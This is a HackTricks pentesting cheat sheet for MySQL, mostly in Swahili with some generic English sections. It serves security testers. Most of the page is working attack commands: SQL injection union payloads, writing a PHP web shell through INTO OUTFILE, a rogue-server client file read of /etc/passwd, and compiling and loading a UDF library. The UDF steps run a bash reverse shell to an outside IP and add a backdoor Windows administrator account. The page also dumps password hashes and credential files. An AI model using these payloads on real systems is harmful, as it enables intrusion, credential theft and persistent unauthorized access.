# 3306 - Pentesting Mysql

<details>

<summary><strong>Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Spain** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni sehemu ya kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

## **Maelezo Muhimu**

**MySQL** inaweza kuelezwa kama mfumo wa usimamizi wa **Hifadhidata ya Uhusiano (RDBMS)** ambao ni wa chanzo wazi na hauna gharama. Inafanya kazi kwa kutumia **Lugha ya Utafutaji Iliyopangwa (SQL)**, kuruhusu usimamizi na uhariri wa hifadhidata.

**Bandari ya chaguo-msingi:** 3306

```
3306/tcp open  mysql
```

## **Kuunganisha**

### **Ndani ya Nchi**

```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
```

### Kijijini

MySQL can be accessed remotely through the network. This allows attackers to exploit vulnerabilities and gain unauthorized access to the database. As a pentester, it is important to understand the different techniques and tools that can be used to test the security of remote MySQL servers.

#### Port Scanning

Port scanning is the process of scanning a range of ports on a target system to identify open ports. This can be done using tools like Nmap. By scanning for open ports, a pentester can identify if the MySQL port (default is 3306) is open and accessible remotely.

#### Banner Grabbing

Banner grabbing is the process of retrieving information about a service running on a specific port. This can be done using tools like Telnet or Netcat. By connecting to the MySQL port and sending specific commands, a pentester can retrieve information about the MySQL server, such as the version number.

#### Brute-Forcing

Brute-forcing is the process of systematically trying all possible combinations of passwords until the correct one is found. This can be done using tools like Hydra or Medusa. By brute-forcing the login credentials of a remote MySQL server, a pentester can gain unauthorized access to the database.

#### SQL Injection

SQL injection is a technique where an attacker injects malicious SQL code into a vulnerable application, which is then executed by the database. This can be used to bypass authentication mechanisms and gain unauthorized access to the database. As a pentester, it is important to understand how to identify and exploit SQL injection vulnerabilities in remote MySQL servers.

#### Exploiting Vulnerabilities

MySQL, like any other software, can have vulnerabilities that can be exploited by attackers. It is important for a pentester to stay updated with the latest vulnerabilities and exploits related to MySQL. By exploiting these vulnerabilities, a pentester can gain unauthorized access to the database or perform other malicious activities.

#### Conclusion

Remote MySQL servers are common targets for attackers due to the sensitive information they store. As a pentester, it is important to understand the different techniques and tools that can be used to test the security of remote MySQL servers. By identifying and exploiting vulnerabilities, a pentester can help organizations secure their databases and protect sensitive information.

```bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```

## Uchunguzi wa Nje

Baadhi ya hatua za uchunguzi zinahitaji kuwa na sifa halali.

```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```

### [**Kuvunja nguvu**](../generic-methodologies-and-resources/brute-force.md#mysql)

### Andika data yoyote ya binary

```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```

## **Amri za MySQL**

```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```

```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```

### Uthibitisho wa Ruhusa za MySQL

MySQL ina mfumo wa usimamizi wa ruhusa ambao unaruhusu watumiaji kutekeleza vitendo tofauti kulingana na ruhusa zao. Wakati wa kufanya ukaguzi wa usalama wa MySQL, ni muhimu kuchunguza ruhusa za watumiaji ili kubaini ikiwa kuna upungufu wa usalama au nafasi za kuvunja mfumo.

#### Kuorodhesha Ruhusa za Mtumiaji

Kuorodhesha ruhusa za mtumiaji kunaweza kufanywa kwa kutumia amri ya SQL ifuatayo:

```sql
SHOW GRANTS FOR 'mtumiaji'@'kituo';
```

Badala ya 'mtumiaji' na 'kituo', weka jina la mtumiaji na anwani ya IP ya kituo unachotaka kuangalia ruhusa zake.

#### Kuorodhesha Ruhusa za Wote

Ikiwa unataka kuorodhesha ruhusa za watumiaji wote, unaweza kutumia amri ifuatayo:

```sql
SELECT user, host, authentication_string FROM mysql.user;
```

Amri hii itaonyesha jina la mtumiaji, anwani ya IP ya kituo, na kamba ya uthibitishaji ya mtumiaji.

#### Kuorodhesha Ruhusa za Database

Kuorodhesha ruhusa za mtumiaji kwa database fulani inaweza kufanywa kwa kutumia amri ifuatayo:

```sql
SHOW GRANTS FOR 'mtumiaji'@'kituo' ON jina_la_database;
```

Badala ya 'mtumiaji', 'kituo', na 'jina\_la\_database', weka habari sahihi kulingana na mahitaji yako.

#### Kuorodhesha Ruhusa za Kazi Maalum

Ikiwa unataka kuorodhesha ruhusa za kazi maalum, unaweza kutumia amri ifuatayo:

```sql
SHOW GRANTS FOR 'mtumiaji'@'kituo' ON jina_la_database.jina_la_kazi;
```

Badala ya 'mtumiaji', 'kituo', 'jina\_la\_database', na 'jina\_la\_kazi', weka habari sahihi kulingana na mahitaji yako.

#### Hitimisho

Kuorodhesha ruhusa za mtumiaji ni hatua muhimu katika ukaguzi wa usalama wa MySQL. Inakuruhusu kuchunguza na kubaini upungufu wa usalama na nafasi za kuvunja mfumo.

```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```

Unaweza kuona katika nyaraka maana ya kila haki: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)

### MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}

## Kusoma faili yoyote ya MySQL kwa njia ya mteja

Kwa kweli, unapojaribu **kupakia data ya eneo katika meza** **yaliyomo ya faili** seva ya MySQL au MariaDB inauliza **mteja kuisoma** na kutuma yaliyomo. **Kwa hivyo, ikiwa unaweza kuhariri mteja wa mysql kuunganisha kwenye seva yako ya MySQL, unaweza kusoma faili yoyote.**\
Tafadhali kumbuka kuwa hii ndiyo tabia inayotumika:

```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```

(Kumbuka neno "local")\
Kwa sababu bila "local" unaweza kupata:

```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```

**Uthibitisho wa Awali:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**Katika karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kuongeza RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Hapa unaweza kupata muhtasari wa shambulio:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)

​

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

​​[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pazuri pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

## POST

### Mtumiaji wa Mysql

Itakuwa ya kuvutia sana ikiwa mysql inaendesha kama **root**:

```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```

#### Mipangilio Hatari ya mysqld.cnf

Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumiwa kufafanua uendeshaji wake na hatua za usalama:

* Mipangilio ya **`user`** hutumiwa kumtaja mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.
* **`password`** hutumiwa kuweka nenosiri linalohusishwa na mtumiaji wa MySQL.
* **`admin_address`** inabainisha anwani ya IP inayosikiliza kwa ajili ya uhusiano wa TCP/IP kwenye kiolesura cha mtandao cha utawala.
* Kipengele cha **`debug`** kinaonyesha mipangilio ya sasa ya uchunguzi, ikiwa ni pamoja na habari nyeti ndani ya magogo.
* **`sql_warnings`** inasimamia ikiwa vifungu vya habari vinazalishwa kwa taarifa za kuingiza safu moja wakati onyo linatokea, likiwa na data nyeti ndani ya magogo.
* Kwa kutumia **`secure_file_priv`**, wigo wa shughuli za uingizaji na usafirishaji wa data unadhibitiwa ili kuimarisha usalama.

### Kuongeza Mamlaka ya Kupata

```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh
```

### Kupanda Hadhi kwa Kutumia Maktaba

Ikiwa **seva ya mysql inaendeshwa kama root** (au mtumiaji mwenye mamlaka zaidi), unaweza kuitumia kutekeleza amri. Kwa hili, unahitaji kutumia **kazi zilizoundwa na mtumiaji**. Na ili kuunda kazi iliyoundwa na mtumiaji, utahitaji **maktaba** kwa mfumo wa uendeshaji unaotumika na mysql.

Maktaba mbaya ya kutumia inaweza kupatikana ndani ya sqlmap na ndani ya metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faili za **`.so`** ni maktaba za **linux** na faili za **`.dll`** ni za **Windows**, chagua ile unayohitaji.

Ikiwa **huna** maktaba hizo, unaweza **kuzitafuta**, au pakua [**msimbo wa C wa linux**](https://www.exploit-db.com/exploits/1518) hapa na **uusakinishe ndani ya mashine ya linux yenye udhaifu**:

```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

Sasa unapokuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye mamlaka (root?) na fuata hatua zifuatazo:

#### Linux

```sql
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```

#### Windows

**MySQL Enumeration**

**MySQL Service Detection**

To detect if MySQL service is running on a Windows machine, you can use the following command:

```bash
sc query mysql
```

If the service is running, you will see the output with the service status and other information.

**MySQL Version Detection**

To determine the version of MySQL running on a Windows machine, you can use the following command:

```bash
mysql --version
```

This command will display the MySQL version information.

**MySQL Default Credentials**

By default, MySQL does not have any default credentials. However, it is common for users to set weak or easily guessable passwords. Therefore, it is recommended to try common default credentials such as `root:root`, `admin:admin`, or `mysql:mysql`.

**MySQL User Enumeration**

To enumerate the users in a MySQL database on a Windows machine, you can use the following command:

```bash
mysql -u <username> -p<password> -e "SELECT user FROM mysql.user"
```

Replace `<username>` with a valid username and `<password>` with the corresponding password.

**MySQL Database Enumeration**

To enumerate the databases in a MySQL server on a Windows machine, you can use the following command:

```bash
mysql -u <username> -p<password> -e "SHOW DATABASES"
```

Replace `<username>` with a valid username and `<password>` with the corresponding password.

**MySQL Table Enumeration**

To enumerate the tables in a specific database in a MySQL server on a Windows machine, you can use the following command:

```bash
mysql -u <username> -p<password> -e "USE <database>; SHOW TABLES"
```

Replace `<username>` with a valid username, `<password>` with the corresponding password, and `<database>` with the name of the database.

**MySQL Column Enumeration**

To enumerate the columns in a specific table in a MySQL server on a Windows machine, you can use the following command:

```bash
mysql -u <username> -p<password> -e "USE <database>; SHOW COLUMNS FROM <table>"
```

Replace `<username>` with a valid username, `<password>` with the corresponding password, `<database>` with the name of the database, and `<table>` with the name of the table.

**MySQL Data Enumeration**

To enumerate the data in a specific table in a MySQL server on a Windows machine, you can use the following command:

```bash
mysql -u <username> -p<password> -e "USE <database>; SELECT * FROM <table>"
```

Replace `<username>` with a valid username, `<password>` with the corresponding password, `<database>` with the name of the database, and `<table>` with the name of the table.

```sql
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

### Kupata siri za MySQL kutoka kwenye faili

Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nywila ya maandishi wazi** ya mtumiaji **debian-sys-maint**

```bash
cat /etc/mysql/debian.cnf
```

Unaweza **kutumia sifa hizi za kuingia kwenye kikundi cha mysql**.

Ndani ya faili: _/var/lib/mysql/mysql/user.MYD_ unaweza kupata **hash zote za watumiaji wa MySQL** (zile unazoweza kuzitoa kutoka mysql.user ndani ya kikundi cha data).

Unaweza kuzitoa kwa kufanya:

```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```

### Kuwezesha kumbukumbu

Unaweza kuwezesha kumbukumbu za maswali ya mysql ndani ya `/etc/mysql/my.cnf` kwa kufuta alama za mstari zifuatazo:

![](<../.gitbook/assets/image (277).png>)

### Faili za kufaa

Faili za Usanidi

* windows \*
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \<InstDir>/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* Historia ya Amri
* \~/.mysql.history
* Faili za Kumbukumbu
* connections.log
* update.log
* common.log

## Hifadhidata/Meza za Msingi za MySQL

ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
USER\_PRIVILEGES\
VIEWS\
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS

columns\_priv\
column\_stats\
db\
engine\_cost\
event\
func\
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
user

accounts\
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
events\_stages\_summary\_by\_thread\_by\_event\_name\
events\_stages\_summary\_by\_user\_by\_event\_name\
events\_stages\_summary\_global\_by\_event\_name\
events\_statements\_current\
events\_statements\_history\
events\_statements\_history\_long\
events\_statements\_summary\_by\_account\_by\_event\_name\
events\_statements\_summary\_by\_digest\
events\_statements\_summary\_by\_host\_by\_event\_name\
events\_statements\_summary\_by\_program\
events\_statements\_summary\_by\_thread\_by\_event\_name\
events\_statements\_summary\_by\_user\_by\_event\_name\
events\_statements\_summary\_global\_by\_event\_name\
events\_transactions\_current\
events\_transactions\_history\
events\_transactions\_history\_long\
events\_transactions\_summary\_by\_account\_by\_event\_name\
events\_transactions\_summary\_by\_host\_by\_event\_name\
events\_transactions\_summary\_by\_thread\_by\_event\_name\
events\_transactions\_summary\_by\_user\_by\_event\_name\
events\_transactions\_summary\_global\_by\_event\_name\
events\_waits\_current\
events\_waits\_history\
events\_waits\_history\_long\
events\_waits\_summary\_by\_account\_by\_event\_name\
events\_waits\_summary\_by\_host\_by\_event\_name\
events\_waits\_summary\_by\_instance\
events\_waits\_summary\_by\_thread\_by\_event\_name\
events\_waits\_summary\_by\_user\_by\_event\_name\
events\_waits\_summary\_global\_by\_event\_name\
file\_instances\
file\_summary\_by\_event\_name\
file\_summary\_by\_instance\
global\_status\
global\_variables\
host\_cache\
hosts\
memory\_summary\_by\_account\_by\_event\_name\
memory\_summary\_by\_host\_by\_event\_name\
memory\_summary\_by\_thread\_by\_event\_name\
memory\_summary\_by\_user\_by\_event\_name\
memory\_summary\_global\_by\_event\_name\
metadata\_locks\
mutex\_instances\
objects\_summary\_global\_by\_type\
performance\_timers\
prepared\_statements\_instances\
replication\_applier\_configuration\
replication\_applier\_status\
replication\_applier\_status\_by\_coordinator\
replication\_applier\_status\_by\_worker\
replication\_connection\_configuration\
replication\_connection\_status\
replication\_group\_member\_stats\
replication\_group\_members\
rwlock\_instances\
session\_account\_connect\_attrs\
session\_connect\_attrs\
session\_status\
session\_variables\
setup\_actors\
setup\_consumers\
setup\_instruments\
setup\_objects\
setup\_timers\
socket\_instances\
socket\_summary\_by\_event\_name\
socket\_summary\_by\_instance\
status\_by\_account\
status\_by\_host\
status\_by\_thread\
status\_by\_user\
table\_handles\
table\_io\_waits\_summary\_by\_index\_usage\
table\_io\_waits\_summary\_by\_table\
table\_lock\_waits\_summary\_by\_table\
threads\
user\_variables\_by\_thread\
users\
variables\_by\_thread

host\_summary\
host\_summary\_by\_file\_io\
host\_summary\_by\_file\_io\_type\
host\_summary\_by\_stages\
host\_summary\_by\_statement\_latency\
host\_summary\_by\_statement\_type\
innodb\_buffer\_stats\_by\_schema\
innodb\_buffer\_stats\_by\_table\
innodb\_lock\_waits\
io\_by\_thread\_by\_latency\
io\_global\_by\_file\_by\_bytes\
io\_global\_by\_file\_by\_latency\
io\_global\_by\_wait\_by\_bytes\
io\_global\_by\_wait\_by\_latency\
latest\_file\_io\
schema\_table\_statistics\
schema\_table\_statistics\_with\_buffer\
schema\_tables\_with\_full\_table\_scans\
schema\_unused\_indexes\
session\
session\_ssl\_status\
statement\_analysis\
statements\_with\_errors\_or\_warnings\
statements\_with\_full\_table\_scans\
statements\_with\_runtimes\_in\_95th\_percentile\
statements\_with\_sorting\
statements\_with\_temp\_tables\
sys\_config\
user\_summary\
user\_summary\_by\_file\_io\
user\_summary\_by\_file\_io\_type\
user\_summary\_by\_stages\
user\_summary\_by\_statement\_latency\
user\_summary\_by\_statement\_type\
version\
wait\_classes\_global\_by\_avg\_latency\
wait\_classes\_global\_by\_latency\
waits\_by\_host\_by\_latency\
waits\_by\_user\_by\_latency\
waits\_global\_by\_latency\
x$host\_summary\
x$host\_summary\_by\_file\_io\
x$host\_summary\_by\_file\_io\_type\
x$host\_summary\_by\_stages\
x$host\_summary\_by\_statement\_latency\
x$host\_summary\_by\_statement\_type\
x$innodb\_buffer\_stats\_by\_schema\
x$innodb\_buffer\_stats\_by\_table\
x$innodb\_lock\_waits\
x$io\_by\_thread\_by\_latency\
x$io\_global\_by\_file\_by\_bytes\
x$io\_global\_by\_file\_by\_latency\
x$io\_global\_by\_wait\_by\_bytes\
x$io\_global\_by\_wait\_by\_latency\
x$latest\_file\_io\
x$memory\_by\_host\_by\_current\_bytes\
x$memory\_by\_thread\_by\_current\_bytes\
x$memory\_by\_user\_by\_current\_bytes\
x$memory\_global\_by\_current\_bytes\
x$memory\_global\_total\
x$processlist\
x$ps\_digest\_95th\_percentile\_by\_avg\_us\
x$ps\_digest\_avg\_latency\_distribution\
x$ps\_schema\_table\_statistics\_io\
x$schema\_flattened\_keys\
x$schema\_index\_statistics\
x$schema\_table\_lock\_waits\
x$schema\_table\_statistics\
x$schema\_table\_statistics\_with\_buffer\
x$schema\_tables\_with\_full\_table\_scans\
x$session\
x$statement\_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements\_with\_full\_table\_scans\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements\_with\_sorting\
x$statements\_with\_temp\_tables\
x$user\_summary\
x$user\_summary\_by\_file\_io\
x$user\_summary\_by\_file\_io\_type\
x$user\_summary\_by\_stages\
x$user\_summary\_by\_statement\_latency\
x$user\_summary\_by\_statement\_type\
x$wait\_classes\_global\_by\_avg\_latency\
x$wait\_classes\_global\_by\_latency\
x$waits\_by\_host\_by\_latency\
x$waits\_by\_user\_by\_latency\
x$waits\_global\_by\_latency

## Amri za Kiotomatiki za HackTricks

```
Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

```

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) ni tukio muhimu zaidi la usalama wa mtandao nchini **Hispania** na moja ya muhimu zaidi barani **Ulaya**. Kwa **kukuza maarifa ya kiufundi**, mkutano huu ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila fani.

{% embed url="https://www.rootedcon.com/" %}

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS wa HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
